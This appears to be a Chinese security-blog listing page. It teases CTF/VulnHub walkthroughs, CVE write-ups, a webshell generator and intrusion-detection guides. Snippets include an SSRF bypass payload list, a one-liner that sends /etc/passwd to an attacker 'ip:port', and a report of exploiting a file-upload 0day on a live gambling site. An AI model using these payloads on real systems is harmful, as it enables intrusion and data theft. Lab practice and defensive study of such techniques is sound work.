从某个大哥手里拿到一个菠菜得day,是一个任意文件上传得0day,通过任意文件上传获取到webshell,但是扫描端口能看到开启了宝塔。然后就出现了下面的问题。使用哥斯拉的bypass插件可以执行命...
【VulnHub系列】DC-4-teehee提权
- 详情介绍请参考下载地址任务目标:拿下系统的root账户 - 靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/1主机信息DC4:...
靶机练习-hackNos: Os-hackNos
STATEMENT声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此...
Linux系统账户后门及排查
系统账户后门是一种最为简单有效的权限维持方式。攻击者在获取目标系统权限的前提下,通过创建一个系统账户作为持久化的据点,这样可以随时通过工具连接到目标系统,达到对目标主机进行长久控制的目的。根据获取的s...
vulnhub靶机-CyberSploit: 2
靶机信息靶机名称:CyberSploit: 2靶机IP:192.168.12.212开始首先进行主机端扫描,探测系统所开放的端口服务发现系统开了两个端口,22端口为SSH远程连接服务,80对应的是一个...
内存马生成器 msmap
项目作者:hosch3n项目地址:https://github.com/hosch3n/msmap0x01 工具介绍Msmap是一个内存马生成器,兼容多种容器、组件、编码器、WebShell / Pr...
11 个步骤完美排查Linux机器是否已经被入侵
原文:https://cloud.tencent.com/developer/article/18823571、入侵者可能会删除机器的日志信息,可以查看日志信息是否还存在或者是否被清空,相关命令示例:...
ACME Mini_httpd 任意文件读取漏洞 CVE-2018-18778
1.漏洞描述漏洞原因是由于没有过滤Http包头的特定字段,导致可以构造访问系统文件的路径,从而导致可访问任意文件,攻击者可以利用该漏洞读取设备的任意文件,这将严重威胁采用Mini_httpd的设备的安...
Vulnhub之AI web1.0
Pdsdt 2019.10.1在这个举国欢庆的日子里,我充满自豪感的看完了阅兵,正准备打开公司CEO(glzjin)的buuoj平台继续刷刷web和一些入门re,忽然想起CEO说国庆平台要关闭,无奈之...
bypass payload list
→ssrf.php?url=http://127.0.0.1:22→ssrf.php?url=http://127.0.0.1:80→srf.php?url=http://127.0.0.1:443→...
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下可使用 cancel 来把回显发送到攻击机端cancel -u "$(cat /etc/passwd)" -h ip:port攻击机...
Linux内核权限提升漏洞DirtyPipe(CVE-2022-0847)
0x01 漏洞描述 2022年3月7日,研究人员公开披露了Linux 内核中的一个权限提升漏洞(CVE-2022-0847,也称为“Dirty Pipe”),允许非特权用户注入和覆盖任意只读文件中的数...
13